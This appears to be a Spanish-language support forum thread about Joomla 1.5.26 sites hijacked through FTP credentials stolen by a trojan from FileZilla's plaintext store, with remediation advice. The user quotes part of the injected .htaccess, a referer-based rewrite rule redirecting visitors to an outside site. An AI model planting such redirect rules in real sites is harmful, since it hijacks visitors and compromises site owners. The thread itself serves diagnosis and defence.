Tengo el joomla 1.5.26 y me han entrado en varias webs (y no por el administrador) con esta versión y me la han redireccionado a otra. Por lo que veo hay fallos de seguridad en joomla 1.5.26
Esta versión ya no va a ser parcheada?
URL del sitio: www.jarfels.info
Hola Alex, lo normal es que te hayan capturado los datos de acceso a la administración de tu Joomla o al acceso FTP de tu cuenta de cPanel. Las contraseñas del acceso FTP de tu cuenta viajan en texto plano por la red, por lo que si accedes desde una red wifi abierta cualquiera te puede capturar las contraseñas. También puede ser que te hayan puesto un malware en tu PC y que te hayan sacado la scontraseñas del Firefox.
Recomendaciones:
-Revisa tu PC de malwareo virus, puedes usar AVG Free si usas Windows como antivirus gratuito:
http://free.avg.com/es-es/inicio
O VirusBarrier para MAC (De pago pero dipone de versión free durante 30 días):
http://www.intego.com/virusbarrier
-Cambia contraseñas de tu cPanel y cuentas FTP.
-Cambia contraseñas de todos tus Joomlas
-No accedas ni a tu Joomla ni a tu cPanel ni FTP desde redes inseguras u ordenadores que no sepas que están limpios.
-Genera una copia de seguridad de tu CPanel desde el gestor de cPAnel y descárgala a tu PC para tener una copia de tu cPanel hackeado y poder analizarlo con posterioridad.
-Si dispones de una copia de seguridad de tus Joomlas e antes de que te lo hayan hackeado, procede a recuperarla.
Si tu Joomla está en una versión 1.5.26 no deben de haber accedido a través de Joomla, sino a través de FTP o cPanel.
Saludos!
Pues investigando me he dado cuenta de que lo que han hecho quien entrara en mis webs ha sido modificar el archivo .htacces
Han añadido las siguientes lineas:
#c3284d#
RewriteEngine On
RewriteCond %{HTTP_REFERER} ...(mas lineas que no pongo que son muy largas)
RewriteRule ^(.*)$ http://michaelmazur.net/xml.php [R=301,L]
Y la web se me reenvia a michaelmazur.net
Puede haber sido un modulo o componente que me lo haya modificado en todas?
Hola Alex,
Normalmente este tipo de malware, que solo infecta sitios de los que se hace con sus credenciales por FTP, no suele modificar el archivo .htaccess pero parece que en tu caso podría haberlo hecho al tener acceso por FTP.
Lo recomendable siempre y como primera medida en estos casos es modificar las contraseñas de acceso a tus servicios y por supuesto, como bien dice David, tener herramientas de control de malware, virus y troyanos y realizar análisis regularmente además de no conectarte a tus servicios contratados desde redes inseguras, principalmente redes wifi públicas o abiertas, principal caldo de cultivo de este tipo de infecciones.
Saludos
Pues teniais razón, todo ha sido por culpa de un troyano que se me metió en el ordenador. El antivirus en un análisis rápido no dió con él, pero en un análisis completo si. El troyano era un capturador de contraseñas, y por lo que parece el programa Filezilla que uso para el acceso FTP guarda los usuarios y contraseñas en un archivo plano sin encriptar, a no ser que en preferencias le digas que no quieres que te guarde las contraseñas.
El troyano encontró las contraseñas y cambió la configuración del .htacces y del index.php
Basicamente lo que hacia es que si entrabas en la web a traves de un buscador, la web te la indexaba a otra web, michaelmazur.net, que por suerte estaba desactivada y no hacia nada. Pero una vez entrabas ya no podias entrar directamente por la barra de navegación a no ser que borraras el historial y las cookies.
En otras web lo que me hizo fue desactivar los estilos CSS pero solo para internet explorer.
Bueno, gracias por todo y cuidado con la configuración del Filezilla.
Un saludo